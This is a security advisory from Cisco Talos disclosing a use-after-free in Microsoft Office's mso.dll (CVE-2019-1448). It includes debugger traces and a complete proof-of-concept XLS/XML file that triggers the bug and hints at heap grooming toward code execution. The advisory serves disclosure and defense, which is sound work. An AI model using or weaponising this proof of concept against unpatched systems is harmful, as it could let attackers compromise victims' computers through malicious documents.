Talos Vulnerability Report

TALOS-2019-0886

Microsoft Office Excel WorksheetOptions Code Execution Vulnerability

November 12, 2019
CVE Number

CVE-2019-1448

Summary

An exploitable use-after-free vulnerability exists in the mso.dll of Microsoft Office. A specially crafted XLS file can cause a use after free, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Tested Versions

Microsoft Office Professional Plus 2016 x86 Microsoft Office 365 ProPlus x86

Product URLs

https://products.office.com

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416: Use After Free

Details

This vulnerability is present in Microsoft Office Excel which is part of the Microsoft Office collection of software applications used in an office environment. More precisely, the vulnerability is related with the component responsible for handling the MicrosoftÆ Office HTML and XML format introduced in Microsoft Office 2000. A specially crafted XLS file being written in a proper form of HTML/XML tags can lead to a use-after-free vunerability and remote code execution. Attaching debugger to Microsoft Excel and loading malformed XLS file we end up in the following context:

Critical error detected c0000374
(1708.1034): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=77c088e0 ecx=c0000374 edx=036d6c81 esi=00000002 edi=feeefeee
eip=77bdbebe esp=036d6df8 ebp=036d6e8c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!RtlReportCriticalFailure+0x4b:
77bdbebe cc              int     3
0:000> !heap -triage
**************************************************************
*                                                            *
*                  HEAP ERROR DETECTED                       *
*                                                            *
**************************************************************

Details:

Heap address:  03850000
Error address: feeefeee
Error type: HEAP_FAILURE_INVALID_ARGUMENT
Details:    The caller tried to a free a block at an invalid
			(unaligned) address.
Follow-up:  Check the error's stack trace to find the culprit.


Stack trace:
Stack trace at 0x77c088e0
	77b2d448: ntdll!RtlFreeHeap+0xd8
	0f4fdc9e: mso20win32client!Ordinal456+0x8c
	06685fcd: mso!Ordinal1638+0x5a5
	00feaa7e: Excel!Ordinal43+0x5daa7e
	00fea2f5: Excel!Ordinal43+0x5da2f5
	02019ff2: Excel!MdCallBack+0x88377f
	00bd8594: Excel!Ordinal43+0x1c8594
	00bd20cb: Excel!Ordinal43+0x1c20cb
	00bd1789: Excel!Ordinal43+0x1c1789
	00bd016c: Excel!Ordinal43+0x1c016c
	00bcfc0e: Excel!Ordinal43+0x1bfc0e
	00bd2540: Excel!Ordinal43+0x1c2540
	00f34a8e: Excel!Ordinal43+0x524a8e
	00bd2a5d: Excel!Ordinal43+0x1c2a5d
	00ac34d9: Excel!Ordinal43+0xb34d9
	00ac1c4e: Excel!Ordinal43+0xb1c4e

As we can see, some invalid/corrupted pointer has been passed to RtlFreeHeap causing a critical exception. That situation occurs because of a heap overflow or due to a use after free where the pointer is a part of some released/garbage memory. Rerunning the application and tracking execution flow before the exception appears we notice that indeed is a use-after-free vulnerability. We can observe it setting breakpoint at location mso!Ordinal2663+0x49 and checking pointer value in the ecx register:

08108bec 8b4c241c   mov     ecx, dword ptr [esp+1Ch]
08108bf0 56         push    esi
08108bf1 e81c2fc3ff call    mso!Ordinal1699+0x26 (07d3bb12)
08108bf6 8bd0       mov     edx, eax

Breakpoint 0 hit
eax=1e829830 ebx=00000002 ecx=19fa0198 edx=00000003 esi=00000001 edi=ffffffff
eip=08108bf6 esp=03cdebfc ebp=19fa1110 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200216
mso!Ordinal2663+0x49:
08108bf6 8bd0            mov     edx,eax
0:000> !heap -p -a 19fa0198
	address 19fa0198 found in
	_HEAP @ 4d00000
	  HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
		19fa0180 0005 0000  [00]   19fa0198    0000c - (busy)
		77bd4f6e ntdll!RtlpCallInterceptRoutine+0x00000026
		77b30e3e ntdll!RtlpAllocateHeapInternal+0x0000063e
		77b307d6 ntdll!RtlAllocateHeap+0x00000036
		f554256 mso20win32client!Ordinal951+0x000000a9
		f554211 mso20win32client!Ordinal951+0x00000064
		7d3ea04 mso!Ordinal2941+0x000000c7

Using that pointer, the function call mso!Ordinal1699+0x26 returns a pointer to an object strictly related to our PoC content. Dumping the content of the memory that the eax pointer refers to we see:

0:000> dd 1e829830
1e829830  00000007 0000006e 1a1e7238 00000024
1e829840  00000000 00000000 00000000 00000000
1e829850  ffffffff 00000000 00670061 00200073
1e829860  00320031 00200039 00780030 00300038
1e829870  00310030 00310030 00360030 00270000
1e829880  006f0062 006c006f 00200000 00610076
1e829890  0075006c 003d0065 00660027 006c0061
1e8298a0  00650073 00200000 003e002f 003c0020
0:000> du 1a1e7238
1a1e7238  "     <CISCO xmlns="">TALOS</CISC"
1a1e7278  "O>....???."

Running the application further we stop again in the same place but we see that the memory state of the object we’re interested in changed dramatically:

Breakpoint 0 hit
eax=20750ee0 ebx=00000002 ecx=19fa0198 edx=00000003 esi=00000001 edi=ffffffff
eip=07528bf6 esp=030df1dc ebp=19626ed0 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
mso!Ordinal2663+0x49:
07528bf6 8bd0            mov     edx,eax
0:000> !heap -p -a 19fa0198
	address 19fa0198 found in
	_HEAP @ 4d00000
	  HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
		19fa0180 0005 0000  [00]   19fa0198    00020 - (free)
		
		77be5b24 ntdll!RtlDebugFreeHeap+0x0000003c
		77b9d5b7 ntdll!RtlpFreeHeap+0x0006dcc7
		77b2db3d ntdll!RtlFreeHeap+0x000007cd
		0f7fdc9e mso20win32client!Ordinal456+0x0000008c
		10b45fd5 mso!Ordinal1638+0x000005ad
		0148aa7e Excel!Ordinal43+0x005daa7e
		0148a2f5 Excel!Ordinal43+0x005da2f5
		024b9ff2 Excel!MdCallBack+0x0088377f
		01078594 Excel!Ordinal43+0x001c8594
		010720cb Excel!Ordinal43+0x001c20cb
		01071789 Excel!Ordinal43+0x001c1789
		0107016c Excel!Ordinal43+0x001c016c
		0106fc0e Excel!Ordinal43+0x001bfc0e
		01072540 Excel!Ordinal43+0x001c2540
		01072a71 Excel!Ordinal43+0x001c2a71
		00f634d9 Excel!Ordinal43+0x000b34d9
		00f61c4e Excel!Ordinal43+0x000b1c4e
		0103e747 Excel!Ordinal43+0x0018e747
		0103dcf0 Excel!Ordinal43+0x0018dcf0
		0e5599fd mso98win32client!Ordinal3239+0x000000b4
		10891f3b mso!Ordinal3673+0x0000073f
		107ab48b mso!Ordinal8171+0x00000381
		0e42bd53 mso98win32client!Ordinal24+0x0000088a
		1063b851 mso!Ordinal3356+0x00000ab2
		0d5742a5 mso40uiwin32client!Ordinal3455+0x00000146
		0d572feb mso40uiwin32client!Ordinal4414+0x00000071
		0d554ee6 mso40uiwin32client!Ordinal2538+0x00007a53
		0d51cc7e mso40uiwin32client!Ordinal2550+0x00000c14
		0d4e5220 mso40uiwin32client!Ordinal2351+0x0000027e
		0d502354 mso40uiwin32client!Ordinal3664+0x00000d40
		0d56bfd7 mso40uiwin32client!Ordinal1393+0x000000b3
 
0:000> !heap -p -a 1e829830
ReadMemory error for address 43340000
Use `!address 43340000' to check validity of the address.
	address 1e829830 found in
	_HEAP @ 4d00000
	  HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
		1e8297e0 00e2 0000  [00]   1e8297f8    00708 - (free)	

as we can see, both objects have been freed. Further usage of these objects during this test leaded to a double free vulnerability:

Critical error detected c0000374
(19ac.e4): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=77c088e0 ecx=c0000374 edx=030defb1 esi=00000002 edi=20665900
eip=77bdbebe esp=030df120 ebp=030df1b4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!RtlReportCriticalFailure+0x4b:
77bdbebe cc              int     3
0:000> kb
 # ChildEBP RetAddr  Args to Child              
00 030df1b4 77be4764 00000001 042e0000 77be3cfc ntdll!RtlReportCriticalFailure+0x4b
01 030df1c0 77be3cfc 404e4248 20665900 042e0000 ntdll!RtlpReportHeapFailure+0x2f
02 030df1f0 77b2d448 20665900 00000000 00000000 ntdll!RtlpLogHeapFailure+0xa7
03 030df24c 0fd2dc9e 042e0000 00000000 20665918 ntdll!RtlFreeHeap+0xd8
WARNING: Stack unwind information not available. Following frames may be wrong.
04 030df274 071602db 20665918 19625d50 20750ee0 mso20win32client!Ordinal456+0x8c
05 030df378 009baa7e 030df534 00000000 042e2468 mso!Ordinal7770+0x774
06 030df490 009ba2f5 00000100 191a3e48 00000003 Excel!Ordinal43+0x5daa7e
07 030e9fbc 019e9ff2 00000000 20678620 191a4bf8 Excel!Ordinal43+0x5da2f5
08 030ea004 005a8594 030fa28c 191a3e48 00000002 Excel!MdCallBack+0x88377f
09 030fa6cc 005a20cb 00000000 00000000 00000002 Excel!Ordinal43+0x1c8594
0a 030fa720 005a1789 00000000 00000000 00000002 Excel!Ordinal43+0x1c20cb
0b 030fcbcc 005a016c 00000000 030fcca8 030fcd68 Excel!Ordinal43+0x1c1789
0c 030fcd24 0059fc0e 00000000 00000014 030fcd68 Excel!Ordinal43+0x1c016c
0d 030fde8c 005a2540 3548a00b 00000000 00000014 Excel!Ordinal43+0x1bfc0e
0e 030fdf5c 005a2a71 00000016 00000000 00000000 Excel!Ordinal43+0x1c2540
0f 030fdf9c 004934d9 030fe838 00000016 00000000 Excel!Ordinal43+0x1c2a71
10 030fe404 00491c4e 00000016 00000000 00000000 Excel!Ordinal43+0xb34d9
11 030fe5b8 0056e747 00000016 00000000 1929dc40 Excel!Ordinal43+0xb1c4e
12 030feca4 0056dcf0 19403510 00000000 030fece8 Excel!Ordinal43+0x18e747
13 030fecb4 066199fd 026638ec 19403508 19403510 Excel!Ordinal43+0x18dcf0
14 030fece8 07271f3b 00000001 dc1dfe0e 1929dc40 mso98win32client!Ordinal3239+0xb4
15 030fed30 0718b48b 194d29a0 01000069 05fc9210 mso!Ordinal3673+0x73f
16 030fed90 064ebd53 194d29a0 00000069 05fc9210 mso!Ordinal8171+0x381
17 030fee24 0701b851 194d29a0 00000069 05fc9210 mso98win32client!Ordinal24+0x88a
18 030fee7c 05a342a5 194d29a0 00000020 05fc9210 mso!Ordinal3356+0xab2
19 030feeb0 05a32feb 18f5f310 05fc9210 191af1b0 mso40uiwin32client!Ordinal3455+0x146
1a 030feec8 05a14ee6 194d29a0 191af1b0 00000020 mso40uiwin32client!Ordinal4414+0x71
1b 030fef08 059dcc7e 18f5f310 194d29a0 1929ba80 mso40uiwin32client!Ordinal2538+0x7a53
1c 030fef4c 059a5220 1929ba80 05f680d0 05fc9210 mso40uiwin32client!Ordinal2550+0xc14
1d 030fef9c 059c2354 05f680d0 00000002 05fc9210 mso40uiwin32client!Ordinal2351+0x27e
1e 030fefd4 05a2bfd7 05f680d0 00000002 05fc9210 mso40uiwin32client!Ordinal3664+0xd40
1f 030ff010 05a8517d 1929ba80 05f680d0 030ff0ac mso40uiwin32client!Ordinal1393+0xb3
20 030ff030 05a2c0a4 19097b50 00000000 5932c70d mso40uiwin32client!Ordinal1633+0x1522
21 030ff064 05a2c4a0 19333ca8 19097b50 030ff0ac mso40uiwin32client!Ordinal1393+0x180
22 030ff0cc 059bb622 030ff384 5932c6c5 00040000 mso40uiwin32client!Ordinal345+0x1f6
23 030ff1ac 05979e59 193273e0 19333ca8 030ff384 mso40uiwin32client!Ordinal892+0xfce
24 030ff1fc 05a19bf7 193273e0 030ff328 00000000 mso40uiwin32client!Ordinal1828+0x744
25 030ff2d8 059cc8f6 193273e0 030ff328 193273ec mso40uiwin32client!Ordinal2580+0xbb
26 030ff310 059cc779 5932c425 06157b00 030ff3d4 mso40uiwin32client!Ordinal1879+0x1e1
27 030ff34c 05adc802 030ff384 00000001 00000001 mso40uiwin32client!Ordinal1879+0x64
28 030ff440 05ab397e 5932c3e5 19333ca8 19342d68 mso40uiwin32client!Ordinal373+0x33f
29 030ff48c 059bb3a6 000ff4ec 5932c205 00040000 mso40uiwin32client!Ordinal2256+0x12a
2a 030ff56c 05979e59 193273e0 19333ca8 19342d68 mso40uiwin32client!Ordinal892+0xd52
2b 030ff5bc 05a19bf7 193273e0 19342d68 00000000 mso40uiwin32client!Ordinal1828+0x744
2c 030ff694 05a8b704 193273e0 19342d68 193273e0 mso40uiwin32client!Ordinal2580+0xbb
2d 030ff6a8 05a1b057 19342d44 5932c185 00000000 mso40uiwin32client!Ordinal4322+0x165d
2e 030ff6ec 0597b134 18f59e80 01a701ff 030ff750 mso40uiwin32client!Ordinal1547+0x68d
2f 030ff71c 059d2a5c 5932cf61 004304f2 18f59e84 mso40uiwin32client!Ordinal4863+0x318
30 030ff808 059d244d 00000202 00000000 01a701ff mso40uiwin32client!Ordinal2761+0x33a
31 030ff858 77923277 00000000 00000202 00000000 mso40uiwin32client!Ordinal58+0xc65
32 030ff884 7791261b 059d23da 004304f2 00000202 USER32!_InternalCallWinProc+0x2b
33 030ff95c 77912197 004304f2 00000202 00000000 USER32!UserCallWinProcCheckWow+0x22b
34 030ff9c4 77911ff0 0044b4b4 030ffb58 0044b4e0 USER32!DispatchMessageWorker+0x197
35 030ff9d0 0044b4e0 030ffa50 030ffa44 0044b459 USER32!DispatchMessageW+0x10
36 030ffb58 003f16e3 0266be24 00000000 02f9c000 Excel!Ordinal43+0x6b4e0
37 030ffd6c 003e124f 003e0000 00000000 042e2b0b Excel!Ordinal43+0x116e3
38 030ffdb8 75489564 02f9c000 75489540 4fa28cf6 Excel!Ordinal43+0x124f
39 030ffdcc 77b5293c 02f9c000 404c4dac 00000000 KERNEL32!BaseThreadInitThunk+0x24
3a 030ffe14 77b52910 ffffffff 77b93c58 00000000 ntdll!__RtlUserThreadStart+0x2b
3b 030ffe24 00000000 003e10bd 02f9c000 00000000 ntdll!_RtlUserThreadStart+0x1b

Looking at the PoC file:

Line 1 	<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40">
Line 2 	<xml>
Line 3 		<x:ExcelWorkbook>
Line 4 			<x:ExcelWorksheets>
Line 5 				<x:ExcelWorksheet>
Line 6 					<x:WorksheetOptions>
Line 7 						<CISCO>TALOS</CISCO>
Line 8 					</x:WorksheetOptions>
Line 9 				</x:ExcelWorksheet>
Line 10			</x:ExcelWorksheets>
Line 11		</x:ExcelWorkbook>
Line 12	</xml>
Line 13	<!-- HEAP FENG SHUI -->
Line 14	<xml>
Line 15	<x:ExcelWorkbook>
Line 16		<x:ExcelWorksheets>
Line 17			<x:ExcelWorksheet>
Line 18				<x:WorksheetOptions>									
Line 19				</x:WorksheetOptions>
Line 20			</x:ExcelWorksheet>
Line 21		</x:ExcelWorksheets>
Line 22	</x:ExcelWorkbook>
Line 23	</xml>

At line 7 we notice an element which we could observe during our analysis. Indeed, the vulnerability is related to the WorksheetOptions element and its subelements. It turns out that an object related with the ExcelWorkbook element is persistent and if in a document there is another ExcelWorkbook element, the object will be reused. Because our WorksheetOptions element does not contain any valid subelement related to it, the object has been released and further reused because of lines 18-19 causing the use-after-free. Proper heap grooming can give an attacker full control of this use-after-free vulnerability and in consequence it can be turned into an arbitrary code execution.

Crash Information

Critical error detected c0000374
(ab8.16dc): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=77c088e0 ecx=c0000374 edx=030d6ad1 esi=00000002 edi=feeefeee
eip=77bdbebe esp=030d6c48 ebp=030d6cdc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!RtlReportCriticalFailure+0x4b:
77bdbebe cc              int     3
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


KEY_VALUES_STRING: 1

	Key  : Analysis.CPU.Sec
	Value: 6

	Key  : Analysis.Elapsed.Sec
	Value: 6

	Key  : Analysis.Memory.CommitPeak.Mb
	Value: 121

	Key  : Timeline.OS.Boot.DeltaSec
	Value: 71853

	Key  : Timeline.Process.Start.DeltaSec
	Value: 31


PROCESSES_ANALYSIS: 1

SERVICE_ANALYSIS: 1

STACKHASH_ANALYSIS: 1

TIMELINE_ANALYSIS: 1

Timeline: !analyze.Start
	Name: <blank>
	Time: 2019-08-08T13:47:03.496Z
	Diff: 496 mSec

Timeline: Dump.Current
	Name: <blank>
	Time: 2019-08-08T13:47:03.0Z
	Diff: 0 mSec

Timeline: Process.Start
	Name: <blank>
	Time: 2019-08-08T13:46:32.0Z
	Diff: 31000 mSec

Timeline: OS.Boot
	Name: <blank>
	Time: 2019-08-07T17:49:30.0Z
	Diff: 71853000 mSec


DUMP_CLASS: 2

DUMP_QUALIFIER: 0

MODLIST_WITH_TSCHKSUM_HASH:  51debefa4d02cd8de76e538ddd2f7279f0854205

MODLIST_SHA1_HASH:  019f8eb6bf67cd378230ca5d9aebb87e5b1a37a3

NTGLOBALFLAG:  70

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  272

DUMP_TYPE:  fe

FAULTING_IP: 
ntdll!RtlReportCriticalFailure+4b
77bdbebe cc              int     3

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 77bdbebe (ntdll!RtlReportCriticalFailure+0x0000004b)
   ExceptionCode: 80000003 (Break instruction exception)
  ExceptionFlags: 00000000
NumberParameters: 3
   Parameter[0]: 00000000
   Parameter[1]: 00000000
   Parameter[2]: 00000000

FAULTING_THREAD:  000016dc

PROCESS_NAME:  Excel.exe

ERROR_CODE: (NTSTATUS) 0x80000003 - {WYJ TEK}  Punkt przerwania  Osi gni to punkt przerwania.

EXCEPTION_CODE: (HRESULT) 0x80000003 (2147483651) - Co najmniej jeden z argument w jest nieprawid owy.

EXCEPTION_CODE_STR:  80000003

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  00000000

EXCEPTION_PARAMETER3:  00000000

WATSON_BKT_PROCSTAMP:  5d173739

WATSON_BKT_PROCVER:  16.0.11328.20368

PROCESS_VER_PRODUCT:  Microsoft Office

WATSON_BKT_MODULE:  ntdll.dll

WATSON_BKT_MODSTAMP:  1d27c592

WATSON_BKT_MODOFFSET:  ebebe

WATSON_BKT_MODVER:  10.0.16299.15

MODULE_VER_PRODUCT:  MicrosoftÆ WindowsÆ Operating System

BUILD_VERSION_STRING:  16299.15.x86fre.rs3_release.170928-1534

ANALYSIS_SESSION_HOST:  DESKTOP-FIEQB1A

ANALYSIS_SESSION_TIME:  08-08-2019 15:47:03.0496

ANALYSIS_VERSION: 10.0.18914.1001 x86fre

THREAD_ATTRIBUTES: 
ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 77be4764 to 77bdbebe

THREAD_SHA1_HASH_MOD_FUNC:  c38cef32e8677ad30a91ee30700b7ce53fe21f0d

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  ad71da21b0069034d236325f1a1b998adb590ec6

OS_LOCALE:  PLK

BUGCHECK_STR:  HEAP_CORRUPTION_ACTIONABLE_InvalidArgument

DEFAULT_BUCKET_ID:  HEAP_CORRUPTION_ACTIONABLE_InvalidArgument

PRIMARY_PROBLEM_CLASS:  HEAP_CORRUPTION

PROBLEM_CLASSES: 

	ID:     [0n261]
	Type:   [ACTIONABLE]
	Class:  Addendum
	Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
			BUCKET_ID
	Name:   Add
	Data:   Add
			String: [InvalidArgument]
	PID:    [0xab8]
	TID:    [0x16dc]
	Frame:  [2] : ntdll!RtlpLogHeapFailure

	ID:     [0n262]
	Type:   [HEAP_CORRUPTION]
	Class:  Primary
	Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
			BUCKET_ID
	Name:   Add
	Data:   Omit
	PID:    [0xab8]
	TID:    [0x16dc]
	Frame:  [3] : ntdll!RtlFreeHeap

STACK_TEXT:  
00000000 00000000 heap_corruption!Excel.exe+0x0


THREAD_SHA1_HASH_MOD:  ca4e26064d24ef7512d2e94de5a93c38dbe82fe9

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  heap_corruption!Excel.exe

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: heap_corruption

IMAGE_NAME:  heap_corruption

DEBUG_FLR_IMAGE_TIMESTAMP:  0

STACK_COMMAND:  !heap ; ** Pseudo Context ** ManagedPseudo ** Value: 7ffa6b0 ** ; kb

BUCKET_ID:  HEAP_CORRUPTION_ACTIONABLE_InvalidArgument_heap_corruption!Excel.exe

FAILURE_EXCEPTION_CODE:  80000003

FAILURE_IMAGE_NAME:  heap_corruption

BUCKET_ID_IMAGE_STR:  heap_corruption

FAILURE_MODULE_NAME:  heap_corruption

BUCKET_ID_MODULE_STR:  heap_corruption

FAILURE_FUNCTION_NAME:  Excel.exe

BUCKET_ID_FUNCTION_STR:  Excel.exe

BUCKET_ID_OFFSET:  0

BUCKET_ID_MODTIMEDATESTAMP:  0

BUCKET_ID_MODCHECKSUM:  0

BUCKET_ID_MODVER_STR:  0.0.0.0

BUCKET_ID_PREFIX_STR:  

FAILURE_PROBLEM_CLASS:  HEAP_CORRUPTION

FAILURE_SYMBOL_NAME:  heap_corruption!Excel.exe

FAILURE_BUCKET_ID:  HEAP_CORRUPTION_ACTIONABLE_InvalidArgument_80000003_heap_corruption!Excel.exe

TARGET_TIME:  2019-08-08T13:47:10.000Z

OSBUILD:  16299

OSSERVICEPACK:  15

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x86

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS

USER_LCID:  0

OSBUILD_TIMESTAMP:  2016-09-06 09:40:45

BUILDDATESTAMP_STR:  170928-1534

BUILDLAB_STR:  rs3_release

BUILDOSVER_STR:  10.0.16299.15.x86fre.rs3_release.170928-1534

ANALYSIS_SESSION_ELAPSED_TIME:  19d6

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:heap_corruption_actionable_invalidargument_80000003_heap_corruption!excel.exe

FAILURE_ID_HASH:  {4c7ed077-e57f-2298-7edd-9e7a6d8bc771}

Followup:     MachineOwner
---------

0:000> lmDvmmso
Browse full module list
start    end        module name
059c0000 0705f000   mso        (export symbols)       C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll
	Loaded symbol image file: C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll
	Image path: C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll
	Image name: mso.dll
	Browse all global symbols  functions  data
	Timestamp:        Fri Jun 28 21:54:19 2019 (5D16EEFB)
	CheckSum:         0169B7F9
	ImageSize:        0169F000
	File version:     16.0.11328.20364
	Product version:  16.0.11328.20364
	File flags:       0 (Mask 3F)
	File OS:          40004 NT Win32
	File type:        2.0 Dll
	File date:        00000000.00000000
	Translations:     0409.04e4
	Information from resource tables:
		CompanyName:      Microsoft Corporation
		ProductName:      Microsoft Office
		InternalName:     MSO
		OriginalFilename: MSO.dll
		ProductVersion:   16.0.11328.20364
		FileVersion:      16.0.11328.20364
		FileDescription:  Microsoft Office component

Timeline

2019-08-16 - Vendor Disclosure
2019-11-12 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.